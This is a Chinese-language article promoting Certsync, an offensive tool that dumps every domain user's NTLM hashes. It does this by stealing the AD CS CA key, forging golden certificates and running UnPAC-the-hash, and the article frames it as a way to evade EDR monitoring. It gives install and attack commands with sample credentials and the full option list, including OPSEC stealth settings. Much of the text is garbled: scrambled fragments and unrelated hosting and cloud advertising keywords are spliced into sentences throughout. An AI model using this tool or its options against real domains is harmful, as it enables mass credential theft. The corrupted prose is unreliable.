Certsync是何使S黄C哈一种使用黄金证书和UnPAC哈希值来远程转储NTDS的新技术。在该工具的用Cc远帮助下 ,广大研究人员能够轻松获取目标域控制器中的程转储用户列表、CA信息和CRL,金证并转储CA证书和私钥 。书和值得一提的何使S黄C哈是模板下载 ,在整个业务流程中 ,用Cc远该工具不需要使用到DRSUAPI 。程转储除此之外,金证该工具的书和运行速度也非常的快,效率非常高 。何使S黄C哈
1、用Cc远从 LDAP 转储用户列表 、高防服务器程转储CA 信息和 CRL;
2 、金证转储 CA 证书和私钥;
3、书和为每个用户离线伪造证书;
4、UnPAC 每个用户的哈希以获得 nt 和 lm 哈希;
由于DSRUAPI(Domain Services Remote Protocol API)越来越受到EDR解决方案的监控和限制,而Certsync则提供了一种绕过这些限制的新方法 。与使用DSRUAPI不同,Certsync不需要域管理员权限 ,源码库只需要CA管理员权限 。
1 、在域中有配置企业CA的ADCS(Active Directory Certificate Services)服务器;
2、PKINIT正常工作;
3、AD中有本地管理员域帐户或导出CA证书和私钥;
由于该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。
接下来 ,广大研究人员可以使用下列命令将该项目源码克隆至本地:
复制git clone https://github.com/zblurx/certsync cd certsync pip install .1.2.3.4.5.或者直接使用pip安装:
复制pip install certsync1.广大研究人员可以通过下列方法直接运行Certsync:
复制certsync -u khal.drogo -p horse -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.121.上述命令将会连接到LDAP服务器,收集用户列表、香港云服务器CA信息和CRL 。然后 ,它会找到CA证书和私钥 ,并为每个用户生成伪造证书。最后,它会使用UnPAC算法获取用户的nt和lm哈希值 。
可以使用-h参数查看所有可用选项和用法示例:
复制$ certsync -h usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username] [-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-use-kcache] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver] [-dns-tcp] [-dc-ip ip address] [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize] Dump NTDS with golden certificates and PKINIT options: -h, --help show this help message and exit -debug Turn DEBUG output ON -outputfile OUTPUTFILE base output filename CA options: -ca-pfx pfx/p12 file name Path to CA certificate -ca-ip ip address IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP authentication options: -d domain.local, -domain domain.local Domain name -u username, -username username Username -p password, -password password Password -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH -no-pass dont ask for password (useful for -k) -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits) -use-kcache Use Kerberos authentication from ccache file (KRB5CCNAME) -kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter connection options: -scheme ldap scheme -ns nameserver Nameserver for DNS resolution -dns-tcp Use TCP instead of UDP for DNS queries -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter OPSEC options: -ldap-filter LDAP_FILTER ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user)) -template cert.pfx base template to use in order to forge certificates -timeout timeout Timeout between PKINIT connection -jitter jitter Jitter between PKINIT connection -randomize Randomize certificate generation. Takes longer to generate all the certificates1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.28.29.30.31.32.33.34.35.36.37.38.39.40.41.42.43.44.45.46.47.48.49.50.51.52.53.54.55.56.57.58.59.60.61.62.63.64.65.66.67.68.69.70.71.72.73.74.75.76.77.78.79.80.81.82.83.84.85.86.87.88.89.90.91.92.93.Certsync提供了一些OPSEC选项,可以自定义工具的行为 :
-ldap-filter:更改用于选择用户名的免费模板LDAP过滤器;
-template :在伪造用户证书时使用指定的证书模板;
-timeout和-jitter :调整PKINIT连接之间的超时和间隔时间;
-randomize :随机化证书生成过程,使每个伪造的用户证书具有不同的私钥、序列号和有效期 ,但会增加生成时间;
使用这些选项可以根据广大研究人员的功能需求自定义Certsync工具的功能。云计算
本项目的开发与发布遵循MIT开源许可证协议 。
Certsync :【GitHub传送门】
https://cyberstoph.org/posts/2019/12/an-introduction-to-golden-certificates/
https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash